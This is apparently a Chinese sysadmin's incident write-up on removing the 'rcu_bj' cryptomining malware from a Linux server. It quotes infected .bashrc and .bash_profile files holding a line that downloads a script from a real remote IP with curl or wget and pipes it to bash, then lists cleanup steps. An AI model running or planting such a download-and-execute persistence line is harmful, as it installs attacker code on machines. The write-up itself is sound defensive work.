记录一次挖矿病毒rcu_bj，导致CPU飙高处理

起因应该是gitlab漏洞导致（建议升级版本或者关闭公网）
服务器监控到服务器CPU持续负载很高，登录服务器查看问题
远程连接到服务器显示/root/.bashrc和/root/bash_frofile文件异常 (如下)

[root@zbxserver ~]# ssh 192.168.64.8
Last login: Sat Apr 29 18:48:51 2023 from 192.168.32.14
-bash: /root/.bashrc: line 14: syntax error: unexpected end of file
-bash: /root/.bash_profile: line 14: syntax error: unexpected end of file

top查看,rcu_bj占用CPU

Tasks: 129 total,   1 running, 128 sleeping,   0 stopped,   0 zombie
%Cpu(s): 50.0 us,  4.3 sy,  0.0 ni, 45.5 id,  0.2 wa,  0.0 hi,  0.0 si,  0.0 st
KiB Mem :  8173780 total,   153720 free,  3089492 used,  4930568 buff/cache
KiB Swap:        0 total,        0 free,        0 used.  2575292 avail Mem 

  PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND                                                                                                    
 1290 root      20   0 2438492 266040   2752 S  95.3  3.3   1022:12 rcu_bj                                                                                                     
 3649 root      20   0  556024  49620  10252 S   1.0  0.6 305:57.80 hosteye                                                                                                    
32162 root      20   0  113540   1784   1268 S   0.7  0.0   8:55.98 sh                                                                                                         
 1053 work      20   0  799884  16432   4960 S   0.3  0.2  46:10.86 ral-agent                                                                                                  
 1054 work      20   0 1062904  13864   1572 S   0.3  0.2  75:48.77 php-cgi                                                                                                    
 8490 root      20   0   90652   2984   2108 S   0.3  0.0  40:59.38 rngd                                                                                                       
    1 root      20   0   51844   3756   2256 S   0.0  0.0 151:18.76 systemd                                                                                                    
    2 root      20   0       0      0      0 S   0.0  0.0   0:01.27 kthreadd                                                                                                   
    4 root       0 -20       0      0      0 S   0.0  0.0   0:00.00 kworker/0:0H                                                                                               
    6 root      20   0       0      0      0 S   0.0  0.0  14:09.84 ksoftirqd/0                                                                                                
    7 root      rt   0       0      0      0 S   0.0  0.0   2:38.12 migration/0                                                                                                
    8 root      20   0       0      0      0 S   0.0  0.0   0:00.00 rcu_bh                                                                                                     
    9 root      20   0       0      0      0 S   0.0  0.0 259:29.46 rcu_sched                                                                                                  
   10 root       0 -20       0      0      0 S   0.0  0.0   0:00.00 lru-add-drain                                                                                              
   11 root      rt   0       0      0      0 S   0.0  0.0   3:46.65 watchdog/0                                                                                                 
   12 root      rt   0       0      0      0 S   0.0  0.0   2:57.72 watchdog/1                                                                                                 
   13 root      rt   0       0      0      0 S   0.0  0.0   2:57.93 migration/1                                                                                                
   14 root      20   0       0      0      0 S   0.0  0.0  14:12.02 ksoftirqd/1                                                                                                
   16 root       0 -20       0      0      0 S   0.0  0.0   0:00.00 kworker/1:0H                                                                                               
   18 root      20   0       0      0      0 S   0.0  0.0   0:00.00 kdevtmpfs                                                                                                  
   19 root       0 -20       0      0      0 S   0.0  0.0   0:00.00 netns                                                                                                      
   20 root      20   0       0      0      0 S   0.0  0.0   0:21.82 khungtaskd                                                                                                 
   21 root       0 -20       0      0      0 S   0.0  0.0   0:00.00 writeback                                                                                                  
   22 root       0 -20       0      0      0 S   0.0  0.0   0:00.00 kintegrityd                                                                                                
   23 root       0 -20       0      0      0 S   0.0  0.0   0:00.00 bioset                                                                                                     
   24 root       0 -20       0      0      0 S   0.0  0.0   0:00.00 bioset                               

打开异常文件发现异常病毒
清除异常配置，如下面得IP地址，肯定是病毒无疑了

[root@localhost ~]#  vim /root/.bashrc
# .bashrc

# User specific aliases and functions

alias rm='rm -i'
alias cp='cp -i'
alias mv='mv -i'

# Source global definitions
if [ -f /etc/bashrc ]; then
        . /etc/bashrc
fi
(curl -s http://123.30.179.206:8189/solr/.v7/booster || wget -q -O - http://123.30.179.206:8189/solr/.v7/booster | bash -sh >/dev/null 2>&1 &

[root@localhost ~]# vim /root/.bash_profile
# .bash_profile

# Get the aliases and functions
if [ -f ~/.bashrc ]; then
        . ~/.bashrc
fi

# User specific environment and startup programs

PATH=$PATH:$HOME/bin

export PATH
(curl -s http://123.30.179.206:8189/solr/.v7/booster || wget -q -O - http://123.30.179.206:8189/solr/.v7/booster | bash -sh >/dev/null 2>&1 &

这个病毒一般会注册自动启动服务，所以要先停掉,不然kill掉会重启

[root@localhost ~]#  systemctl disable systemd_s.service
Removed symlink /etc/systemd/system/multi-user.target.wants/systemd_s.service.
You have new mail in /var/spool/mail/root
[root@localhost ~]#  systemctl stop systemd_s.service

现在查看进程kill掉即可,不kill掉3个服务的话你执行crontab -e 时候会自动退出不能编辑

[root@localhost ~]#  ps -ef|grep rcu
root         8     2  0  2021 ?        00:00:00 [rcu_bh]
root         9     2  0  2021 ?        02:58:05 [rcu_sched]
root     22528 18979  0 19:51 pts/0    00:00:00 grep --color=auto rcu
root     24392     1  0 00:58 ?        00:00:20 /bin/sh /usr/lib/sys/rcu_udev
root     24461 24392  1 00:58 ?        00:12:46 /bin/sh /usr/lib/sys/rcu_libk
root     25725     1 90 00:59 ?        16:58:48 /usr/lib/sys/rcu_bj
[root@localhost ~]# kill -9 24392
[root@localhost ~]# kill -9 24461
[root@localhost ~]# kill -9 25725
#清理程序文件
[root@localhost ~]# cd /usr/lib/sys
[root@localhost sys]#  cat /dev/null >rcu_bj
[root@localhost sys]#  cat /dev/null >rcu_libk
[root@localhost sys]#  cat /dev/null >rcu_udev
[root@localhost sys]#  cat /dev/null >systemd
#释放内存
[root@localhost sys]#  echo 1 > /proc/sys/vm/drop_caches
[root@localhost sys]#  echo 2 > /proc/sys/vm/drop_caches
[root@localhost sys]#  echo 3 > /proc/sys/vm/drop_caches
#执行crontab -e 删除第一个病毒执行任务
[root@localhost sys]# crontab -e
*/5 * * * * /bin/bash /usr/lib/sys/systemd
*/5 * * * * /opt/hosteye/bin/upgrade --upgrade_mode=8>/dev/null 2>&1

这个病毒会关闭系统日志，清楚完开启日志 sudo systemctl restart rsyslog